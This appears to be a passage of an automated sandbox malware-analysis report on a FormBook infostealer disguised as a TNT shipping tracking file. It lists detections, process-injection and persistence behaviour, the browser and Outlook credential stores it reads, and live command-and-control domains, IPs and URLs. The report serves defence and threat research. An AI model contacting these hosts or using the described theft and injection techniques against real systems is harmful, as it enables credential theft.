                    Source: bRQIkEscRm.exe, 00000009.00000002.3370733347.0000000001560000.00000002.00000001.00040000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000000.2584692196.0000000001561000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                    Source: TNT AWB TRACKING DETAILS.exe, jailkeeper.exe, bRQIkEscRm.exe, 00000009.00000002.3370733347.0000000001560000.00000002.00000001.00040000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000000.2584692196.0000000001561000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: bRQIkEscRm.exe, 00000009.00000002.3370733347.0000000001560000.00000002.00000001.00040000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000000.2584692196.0000000001561000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: bRQIkEscRm.exe, 00000009.00000002.3370733347.0000000001560000.00000002.00000001.00040000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000000.2584692196.0000000001561000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EE862B cpuid 0_2_00EE862B
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EF4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00EF4E87
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F01E06 GetUserNameW,0_2_00F01E06
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EF3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00EF3F3A
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EC49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00EC49A0
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.3370359960.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3370703283.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2674996160.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3369010830.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3371766946.0000000004A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2680764092.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2686142507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3366041781.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2667870776.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\SysWOW64\mobsync.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                    Source: jailkeeper.exeBinary or memory string: WIN_81
                    Source: jailkeeper.exeBinary or memory string: WIN_XP
                    Source: jailkeeper.exeBinary or memory string: WIN_XPe
                    Source: jailkeeper.exeBinary or memory string: WIN_VISTA
                    Source: jailkeeper.exeBinary or memory string: WIN_7
                    Source: jailkeeper.exeBinary or memory string: WIN_8
                    Source: jailkeeper.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                    Remote Access Functionality

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.3370359960.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3370703283.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2674996160.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3369010830.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3371766946.0000000004A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2680764092.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2686142507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3366041781.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2667870776.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F36283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00F36283
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F36747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00F36747
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_00236283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00236283
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_00236747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00236747

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		2
                    Valid Accounts                    		2
                    Native API                    		111
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		4
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt2
                    Valid Accounts                    		1
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		Security Account Manager2
                    File and Directory Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		4
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder                    		2
                    Valid Accounts                    		2
                    Obfuscated Files or Information                    		NTDS117
                    System Information Discovery                    		Distributed Component Object Model21
                    Input Capture                    		4
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		LSA Secrets251
                    Security Software Discovery                    		SSH3
                    Clipboard Data                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
                    Process Injection                    		1
                    Masquerading                    		Cached Domain Credentials2
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
                    Registry Run Keys / Startup Folder                    		2
                    Valid Accounts                    		DCSync3
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                    Virtualization/Sandbox Evasion                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                    Access Token Manipulation                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron312
                    Process Injection                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576937 Sample: TNT AWB TRACKING DETAILS.exe Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 41 www.medicaresbasics.xyz 2->41 43 www.meliorahomes.net 2->43 45 5 other IPs or domains 2->45 73 Suricata IDS alerts for network traffic 2->73 75 Antivirus detection for URL or domain 2->75 77 Multi AV Scanner detection for submitted file 2->77 81 6 other signatures 2->81 11 TNT AWB TRACKING DETAILS.exe 6 2->11         started        15 wscript.exe 1 2->15         started        signatures3 79 Performs DNS queries to domains with low reputation 41->79 process4 file5 39 C:\Users\user\AppData\...\jailkeeper.exe, PE32 11->39 dropped 85 Binary is likely a compiled AutoIt script file 11->85 17 jailkeeper.exe 3 11->17         started        87 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->87 21 jailkeeper.exe 2 15->21         started        signatures6 process7 file8 37 C:\Users\user\AppData\...\jailkeeper.vbs, data 17->37 dropped 61 Multi AV Scanner detection for dropped file 17->61 63 Binary is likely a compiled AutoIt script file 17->63 65 Machine Learning detection for dropped file 17->65 71 2 other signatures 17->71 23 svchost.exe 17->23         started        67 Writes to foreign memory regions 21->67 69 Maps a DLL or memory area into another process 21->69 26 svchost.exe 21->26         started        signatures9 process10 signatures11 83 Maps a DLL or memory area into another process 23->83 28 bRQIkEscRm.exe 23->28 injected process12 dnsIp13 47 www.martmall.info 209.74.64.189, 49976, 80 MULTIBAND-NEWHOPEUS United States 28->47 49 www.meliorahomes.net 8.217.17.192, 49938, 49944, 49951 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 28->49 51 arcare.partners 3.33.130.190, 49841, 49880, 49886 AMAZONEXPANSIONGB United States 28->51 89 Found direct / indirect Syscall (likely to bypass EDR) 28->89 32 mobsync.exe 13 28->32         started        signatures14 process15 signatures16 53 Tries to steal Mail credentials (via file / registry access) 32->53 55 Tries to harvest and steal browser information (history, passwords, etc) 32->55 57 Modifies the context of a thread in another process (thread injection) 32->57 59 2 other signatures 32->59 35 firefox.exe 32->35         started        process17

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    TNT AWB TRACKING DETAILS.exe58%ReversingLabsWin32.Trojan.Nymeria
                    TNT AWB TRACKING DETAILS.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\hurtling\jailkeeper.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\hurtling\jailkeeper.exe58%ReversingLabsWin32.Trojan.Nymeria

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.martmall.info0%Avira URL Cloudsafe
                    http://www.medicaresbasics.xyz/fm31/0%Avira URL Cloudsafe
                    http://www.martmall.info/mnch/0%Avira URL Cloudsafe
                    http://www.arcare.partners/0w45/?RDupG=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LSEn3qWTHIIMAUdJFcTrpTiN/JQeOvxH0Rgqs0rYow7etS27iW8=&wdw=m8AHs100%Avira URL Cloudmalware
                    http://www.meliorahomes.net/ir1u/0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    medicaresbasics.xyz
                    		3.33.130.190
                    		truetrue
                      		unknown
                      arcare.partners
                      		3.33.130.190
                      		truetrue
                        		unknown
                        www.martmall.info
                        		209.74.64.189
                        		truetrue
                          		unknown
                          www.meliorahomes.net
                          		8.217.17.192
                          		truetrue
                            		unknown
                            www.resellnexa.shop
                            		unknown
                            		unknownfalse
                              		unknown
                              www.medicaresbasics.xyz
                              		unknown
                              		unknowntrue
                                		unknown
                                www.arcare.partners
                                		unknown
                                		unknownfalse
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.martmall.info/mnch/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.arcare.partners/0w45/?RDupG=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LSEn3qWTHIIMAUdJFcTrpTiN/JQeOvxH0Rgqs0rYow7etS27iW8=&wdw=m8AHstrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.medicaresbasics.xyz/fm31/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.meliorahomes.net/ir1u/true
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://ac.ecosia.org/autocomplete?q=mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/chrome_newtabmobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.martmall.infobRQIkEscRm.exe, 00000009.00000002.3369010830.0000000000FB2000.00000040.80000000.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://duckduckgo.com/ac/?q=mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.ecosia.org/newtab/mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  8.217.17.192
                                                  		www.meliorahomes.netSingapore
                                                  		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                  209.74.64.189
                                                  		www.martmall.infoUnited States
                                                  		31744MULTIBAND-NEWHOPEUStrue
                                                  3.33.130.190
                                                  		medicaresbasics.xyzUnited States
                                                  		8987AMAZONEXPANSIONGBtrue

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1576937
                                                  Start date and time:2024-12-17 18:37:06 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 8m 53s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:12
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:TNT AWB TRACKING DETAILS.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.expl.evad.winEXE@14/11@5/3
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 99%
                                                  • Number of executed functions: 56
                                                  • Number of non-executed functions: 277
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: TNT AWB TRACKING DETAILS.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  12:39:30API Interceptor258965x Sleep call for process: mobsync.exe modified
                                                  18:38:02AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  8.217.17.192TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                  • www.meliorahomes.net/ir1u/
                                                  H1CYDJ8LQe.exeGet hashmaliciousFormBookBrowse
                                                  • www.meliorahomes.net/y4rz/
                                                  z1SupplyInvoiceCM60916_Doc.exeGet hashmaliciousFormBookBrowse
                                                  • www.meliorahomes.net/x0tl/
                                                  shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • www.meliorahomes.net/v6hi/
                                                  209.74.64.1893NvALxFlHV.exeGet hashmaliciousFormBookBrowse
                                                  • www.martmall.info/mnch/
                                                  2ULrUoVwTx.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.guvosh.info/weoa/?zF=oJ3h&TZe=EoFNcPjpgMXDCm2Fqpv9chcO//vCOK6+pKCezFiYD4jbj2Yo7D13E7NcxzwFrISbrXGSJXEIolRF+rdzKXlRzj47a3cr9e8k2bIQ5hr8OKJvNKG0Ug==
                                                  mBms4I508x.exeGet hashmaliciousFormBookBrowse
                                                  • www.maltad.pro/uhoh/
                                                  Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.solfhub.top/vhow/
                                                  COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                  • www.martmall.info/mnch/
                                                  General terms and conditions of sale - Valid from 10202024 to 12312024.exeGet hashmaliciousFormBookBrowse
                                                  • www.telsems.xyz/cw5u/?jB=imLActLk+x2xsx1GEJF5DZHHpQpyGPLFP82EGniwrEQwdS7fFfqL4LZhs1ZgZ7V75hZVb3KEINx2ZFSt81lTbT4CT7bnoLOJ9N6wdLppJljwAE6YNQ==&ldz=rxiD0VSh
                                                  Request for 30 Downpayment.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.unbuys.online/nzii/
                                                  Tandemmernes90.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.martmall.info/o60r/
                                                  rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.guvosh.info/weoa/
                                                  3.33.130.190236236236.elfGet hashmaliciousUnknownBrowse
                                                  • lojasdinastia.com.br/
                                                  TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                  • www.medicaresbasics.xyz/fm31/
                                                  profroma invoice.exeGet hashmaliciousFormBookBrowse
                                                  • www.iglpg.online/rbqc/
                                                  SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • www.tdassetmgt.info/d55l/
                                                  goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                  • www.deikamalaharris.info/lrgf/
                                                  ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                  • www.likesharecomment.net/nqht/
                                                  Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                  • www.cbprecise.online/cvmn/
                                                  Outstanding Invoices Spreadsheet Scan 00495_PDF.exeGet hashmaliciousFormBookBrowse
                                                  • www.binacamasala.com/gnm5/
                                                  PO2412010.exeGet hashmaliciousFormBookBrowse
                                                  • www.goldstarfootwear.shop/8m07/
                                                  Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                  • www.emirates-visa.net/6wmy/

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  www.meliorahomes.netTNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                  • 8.217.17.192
                                                  H1CYDJ8LQe.exeGet hashmaliciousFormBookBrowse
                                                  • 8.217.17.192
                                                  rInvoiceCM60916_xlx.exeGet hashmaliciousFormBookBrowse
                                                  • 8.217.17.192
                                                  z1SupplyInvoiceCM60916_Doc.exeGet hashmaliciousFormBookBrowse
                                                  • 8.217.17.192
                                                  shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 8.217.17.192
                                                  www.martmall.info3NvALxFlHV.exeGet hashmaliciousFormBookBrowse
                                                  • 209.74.64.189
                                                  COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                  • 209.74.64.189
                                                  Tandemmernes90.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 209.74.64.189

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  MULTIBAND-NEWHOPEUSz1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                  • 209.74.79.41
                                                  ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                  • 209.74.77.107
                                                  SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 209.74.64.58
                                                  PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                  • 209.74.79.40
                                                  ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                  • 209.74.77.107
                                                  Rockwool-Msg-S9039587897.pdfGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                  • 209.74.95.101
                                                  SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                  • 209.74.79.42
                                                  Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                  • 209.74.64.187
                                                  CJE003889.exeGet hashmaliciousFormBookBrowse
                                                  • 209.74.79.40
                                                  ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                  • 209.74.79.41
                                                  AMAZONEXPANSIONGBhttps://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29tGet hashmaliciousUnknownBrowse
                                                  • 3.33.220.150
                                                  https://alluc.co/watch-movies/passengers.htmlGet hashmaliciousUnknownBrowse
                                                  • 52.223.40.198
                                                  setup.msiGet hashmaliciousAteraAgentBrowse
                                                  • 52.223.39.232
                                                  ij4YvAl59D.exeGet hashmaliciousRisePro StealerBrowse
                                                  • 3.36.173.8
                                                  z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                  • 52.223.13.41
                                                  https://dot.itsecuritymessages.com/45sf4657dvz4hn/afc6c7/00179cbf-581d-4c00-98d3-bf1104b204adGet hashmaliciousUnknownBrowse
                                                  • 15.200.58.134
                                                  236236236.elfGet hashmaliciousUnknownBrowse
                                                  • 3.33.130.190
                                                  http://898.tv/LantekqsGet hashmaliciousUnknownBrowse
                                                  • 52.223.21.92
                                                  TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                  • 3.33.130.190
                                                  sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 3.38.180.241
                                                  CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdChttps://sos-at-vie-1.exo.io/ilbuck/sato/process/continue-after-check-vr2.htmlGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                  • 149.129.200.32
                                                  236236236.elfGet hashmaliciousUnknownBrowse
                                                  • 8.222.255.113
                                                  https://www.sendspace.com/pro/dl/m2hhc1Get hashmaliciousUnknownBrowse
                                                  • 147.139.142.100
                                                  https://www.sendspace.com/pro/dl/m2hhc1Get hashmaliciousUnknownBrowse
                                                  • 147.139.142.100
                                                  arm5.elfGet hashmaliciousMiraiBrowse
                                                  • 8.217.36.232
                                                  x86.elfGet hashmaliciousMiraiBrowse
                                                  • 8.218.63.155
                                                  TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                  • 8.217.17.192
